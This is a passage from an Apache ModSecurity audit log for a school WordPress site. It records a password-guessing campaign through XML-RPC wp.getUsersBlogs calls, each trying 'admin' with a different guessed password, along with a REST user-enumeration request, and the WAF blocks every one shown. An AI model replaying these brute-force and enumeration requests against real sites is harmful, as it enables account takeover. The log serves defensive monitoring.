2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067332912369 6825 (- - -) Stopwatch2: 1745067332912369 6825; combined=4978, p1=741, p2=4057, p3=0, p4=0, p5=108, sr=93, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7cc143f-Z-- --d866f646-A-- [19/Apr/2025:19:56:36 +0700] aAOdhEruoUXZj665VUHbAAAAAMI 103.236.140.4 33378 103.236.140.4 8181 --d866f646-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d866f646-C-- wp.getUsersBlogs admin 1234554321 --d866f646-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d866f646-E-- --d866f646-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067396557944 5056 (- - -) Stopwatch2: 1745067396557944 5056; combined=3709, p1=500, p2=3037, p3=0, p4=0, p5=102, sr=154, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d866f646-Z-- --ac38c556-A-- [19/Apr/2025:19:57:36 +0700] aAOdwHNa4dA2HllpK_NitgAAAIs 103.236.140.4 38696 103.236.140.4 8181 --ac38c556-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ac38c556-C-- wp.getUsersBlogs admin servmask --ac38c556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac38c556-E-- --ac38c556-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067456655014 5252 (- - -) Stopwatch2: 1745067456655014 5252; combined=4025, p1=476, p2=3360, p3=0, p4=0, p5=112, sr=106, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac38c556-Z-- --6344c962-A-- [19/Apr/2025:19:58:45 +0700] aAOeBevDiFC_ir7MDwbOuwAAAEs 103.236.140.4 45340 103.236.140.4 8181 --6344c962-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6344c962-C-- wp.getUsersBlogs admin asdasd123 --6344c962-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6344c962-E-- --6344c962-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067525251726 6155 (- - -) Stopwatch2: 1745067525251726 6155; combined=4426, p1=614, p2=3560, p3=0, p4=0, p5=146, sr=159, sw=106, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6344c962-Z-- --8f196851-A-- [19/Apr/2025:19:59:47 +0700] aAOeQ3Na4dA2HllpK_NmSAAAAIY 103.236.140.4 51084 103.236.140.4 8181 --8f196851-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8f196851-C-- wp.getUsersBlogs admin admin1992 --8f196851-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f196851-E-- --8f196851-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067587758594 4897 (- - -) Stopwatch2: 1745067587758594 4897; combined=3321, p1=414, p2=2761, p3=0, p4=0, p5=86, sr=73, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f196851-Z-- --6d5c276e-A-- [19/Apr/2025:20:00:47 +0700] aAOef-vDiFC_ir7MDwbQ1QAAAE0 103.236.140.4 56042 103.236.140.4 8181 --6d5c276e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6d5c276e-C-- wp.getUsersBlogs admin steelers --6d5c276e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d5c276e-E-- --6d5c276e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067647843393 4066 (- - -) Stopwatch2: 1745067647843393 4066; combined=2744, p1=361, p2=2261, p3=0, p4=0, p5=73, sr=55, sw=49, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d5c276e-Z-- --84215b33-A-- [19/Apr/2025:20:01:48 +0700] aAOevA6cTFSgLAHl7PrDHgAAABQ 103.236.140.4 32928 103.236.140.4 8181 --84215b33-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --84215b33-C-- wp.getUsersBlogs admin Marketing2018_ --84215b33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84215b33-E-- --84215b33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067708158028 5293 (- - -) Stopwatch2: 1745067708158028 5293; combined=3733, p1=476, p2=3040, p3=0, p4=0, p5=126, sr=126, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84215b33-Z-- --56d6894d-A-- [19/Apr/2025:20:02:48 +0700] aAOe-EruoUXZj665VUHikQAAAME 103.236.140.4 37064 103.236.140.4 8181 --56d6894d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --56d6894d-C-- wp.getUsersBlogs admin 999999 --56d6894d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56d6894d-E-- --56d6894d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067768323214 5663 (- - -) Stopwatch2: 1745067768323214 5663; combined=3877, p1=476, p2=3210, p3=0, p4=0, p5=113, sr=104, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56d6894d-Z-- --ab58c658-A-- [19/Apr/2025:20:03:48 +0700] aAOfNHNa4dA2HllpK_NqgQAAAJY 103.236.140.4 41960 103.236.140.4 8181 --ab58c658-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ab58c658-C-- wp.getUsersBlogs admin manager --ab58c658-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab58c658-E-- --ab58c658-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067828024605 5856 (- - -) Stopwatch2: 1745067828024605 5856; combined=4061, p1=491, p2=3373, p3=0, p4=0, p5=114, sr=86, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab58c658-Z-- --08974a49-A-- [19/Apr/2025:20:04:50 +0700] aAOfcnNa4dA2HllpK_NrqwAAAJE 103.236.140.4 47068 103.236.140.4 8181 --08974a49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --08974a49-C-- wp.getUsersBlogs admin ladybug --08974a49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08974a49-E-- --08974a49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067890495282 6391 (- - -) Stopwatch2: 1745067890495282 6391; combined=4534, p1=599, p2=3731, p3=0, p4=0, p5=119, sr=72, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08974a49-Z-- --9f8ceb4c-A-- [19/Apr/2025:20:05:44 +0700] aAOfqHNa4dA2HllpK_NssQAAAIU 103.236.140.4 51206 103.236.140.4 8181 --9f8ceb4c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.69 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9f8ceb4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f8ceb4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745067944823973 2738 (- - -) Stopwatch2: 1745067944823973 2738; combined=1212, p1=396, p2=783, p3=0, p4=0, p5=32, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f8ceb4c-Z-- --41e02874-A-- [19/Apr/2025:20:05:48 +0700] aAOfrHNa4dA2HllpK_Ns1wAAAIU 103.236.140.4 51474 103.236.140.4 8181 --41e02874-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.69 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --41e02874-C-- demo.sayHello --41e02874-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --41e02874-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067948148104 6014 (- - -) Stopwatch2: 1745067948148104 6014; combined=4699, p1=559, p2=3847, p3=51, p4=72, p5=101, sr=75, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41e02874-Z-- --4126cf17-A-- [19/Apr/2025:20:05:56 +0700] aAOftA6cTFSgLAHl7PrIDwAAAA0 103.236.140.4 52082 103.236.140.4 8181 --4126cf17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4126cf17-C-- wp.getUsersBlogs admin marketing2020_ --4126cf17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4126cf17-E-- --4126cf17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067956209426 5868 (- - -) Stopwatch2: 1745067956209426 5868; combined=4137, p1=503, p2=3435, p3=0, p4=0, p5=114, sr=86, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4126cf17-Z-- --ad178453-A-- [19/Apr/2025:20:06:57 +0700] aAOf8UruoUXZj665VUHnygAAAMc 103.236.140.4 57098 103.236.140.4 8181 --ad178453-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ad178453-C-- wp.getUsersBlogs admin marketing2019 --ad178453-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad178453-E-- --ad178453-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068017873693 5144 (- - -) Stopwatch2: 1745068017873693 5144; combined=3699, p1=441, p2=3041, p3=0, p4=0, p5=125, sr=92, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad178453-Z-- --3e25e570-A-- [19/Apr/2025:20:07:57 +0700] aAOgLXNa4dA2HllpK_NvHQAAAIU 103.236.140.4 33708 103.236.140.4 8181 --3e25e570-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3e25e570-C-- wp.getUsersBlogs admin smkn22-jkt_sch_id --3e25e570-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e25e570-E-- --3e25e570-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068077144605 4524 (- - -) Stopwatch2: 1745068077144605 4524; combined=3408, p1=393, p2=2874, p3=0, p4=0, p5=84, sr=80, sw=57, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e25e570-Z-- --72c2345a-A-- [19/Apr/2025:20:08:58 +0700] aAOgakruoUXZj665VUHqkgAAAMA 103.236.140.4 38646 103.236.140.4 8181 --72c2345a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --72c2345a-C-- wp.getUsersBlogs admin matthew1 --72c2345a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72c2345a-E-- --72c2345a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068138083175 5610 (- - -) Stopwatch2: 1745068138083175 5610; combined=4047, p1=460, p2=3415, p3=0, p4=0, p5=100, sr=87, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72c2345a-Z-- --14be5f60-A-- [19/Apr/2025:20:09:59 +0700] aAOgpw6cTFSgLAHl7PrNNQAAABA 103.236.140.4 43128 103.236.140.4 8181 --14be5f60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 231 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --14be5f60-C-- wp.getUsersBlogs admin smkn22-jkt-sch-id123 --14be5f60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; 